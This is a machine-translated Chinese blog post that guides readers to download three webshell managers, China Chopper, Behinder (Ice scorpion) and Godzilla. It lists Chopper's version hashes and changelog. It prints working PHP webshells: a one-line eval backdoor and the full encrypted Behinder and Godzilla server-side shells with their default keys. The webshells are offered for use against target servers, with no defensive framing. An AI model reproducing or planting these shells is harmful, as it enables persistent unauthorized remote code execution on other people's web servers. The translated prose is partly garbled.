当前位置：网站首页>Download of common getshell tools

Download of common getshell tools

2022-07-19 11:12:00 【quan9i】

Chinese kitchen knife

Download link
https://github.com/raddyfiy/caidao-official-version
Verify after downloading MD5 value

certutil -hashfile caidao.exe MD5

Insert picture description here
Compare with the document

(chopper.exe)md5 Verification code of each version （ only exe The main program ）: 
	20111116 => 5001ef50c7e869253a7c152a638eab8a
	20141213 => 4b4a956b9c7dc734f339fa05e4c2a990
	20160620 - ac86066ffd58779f4c0db5030574b0cb
	20160622 - acaf6564637ba97f73297b0096c2994c 	# Repair the mysql The statement 
	
	20160622 The configuration file caidao.conf - > 4ed9e48fcfc0119a0f47ea89db6cd6ab

 Earlier ：

	20111116 => 5001ef50c7e869253a7c152a638eab8a
		 along with GMT Dynamic password for date change , Please pay attention to the usage readme.txt
	20111022 => 7876d05ed4ee02967afc44a936186d2e
		Customize Mode C# The server adds the database management function ...
	20110811 => 854bb49a84ce784ad70da7fd356d4f49
		ASP.NET Upload part of Bug Repair ,  Another one was written Customize Mode C# Server side 
	20110806 => 4c8bc36c41151170f701f755ef700916
		 Fix some BUG
	20110710 => d89c5957a1dc72bb229be070635e19b2
		 Solve the problem that the return value of the confirmation dialog box is incorrect BUG.
	20110707 => ec66b85fba3a8b7d1a41910ae5239b24
		 Solve the problem of opening a new tab in the browser BUG.
	20110703 => 3a8140e8e124326388cb13e6d9d0d4b5
		 Several options have been added to the configuration ：
		 Example of default terminal program path setting ：<SHELL>/bin/sh</SHELL>
		 Example of default command setting of virtual terminal ：<CMD>whoami</CMD>
		 Example of directory settings opened by default for file management ：<CD>c:\windows\temp\</CD>
	20110630 => 7e6c415ca57e6ecaa6c61147a2549477
		 Database import , Write a script and submit it after coding , Repair browser small BUG, Other .
		 The website opens a self written script sharing column , The script coding specification can be seen in the downloaded example .
	20110628 => 60b49098d099ad01c3d80a5f794d4ebd
		PHP Connect MySQL Add a <L></L> Options , Used to set the character set of the database ;
		 The self written script can be executed in the browser , For an example, see  Script/phpspy2011.ccc;
		 Solve the problem of slow display when there are too many directory files ;
		 Because the cache library read has changed , It's best to empty the cache after this update .
		 Can download ip.dat Put it in the directory of the kitchen knife , Used to display the country of the website .
		 You can send me an email if you have any problems with it .
	20100928 => c05d44dbe353525f492208d891b53875
		 Interface adjustment , Fixed some BUG, Add a ColdFusion Example server of version ( Only file management and virtual terminals ,MX 7 The function of modifying file time in versions and below is not available )
	20100812 => 4398e87939edb8573c44592942dca503
		 Major renewal , From this version , Kitchen knife open interface , Support all dynamic scripts , The server can be customized on demand .
		 Wrote a jsp The service side ( file management / Virtual terminal / Database management ), Other servers can write by themselves according to the interface ！

Confirm that there is no back door , installation is complete
Start using , This tool is similar to Chinese ant sword , Used to connect a sentence Trojan getshell
Write the path on the left , Just write the password on the right , The content of the document is <?php @eval($_POST[1]);?> Insert picture description here

Ice scorpion

Download link
https://github.com/rebeyond/Behinder/releases
establish shell file , The content is the one brought by ice scorpion shell.php that will do , As shown below

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; // The key is the connection password 32 position md5 Before the value 16 position , Default connection password rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
    
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
    
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{
    public function __invoke($p) {
    eval($p."");}}
    @call_user_func(new C(),$params);
?>

Insert picture description here

Godzilla

Download address
https://github.com/BeichenDream/Godzilla/releases
shell The contents are as follows

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    
    for($i=0;$i<strlen($D);$i++) {
    
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){
    
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
    
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
    
        if (stripos($data,"getBasicsInfo")!==false){
    
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}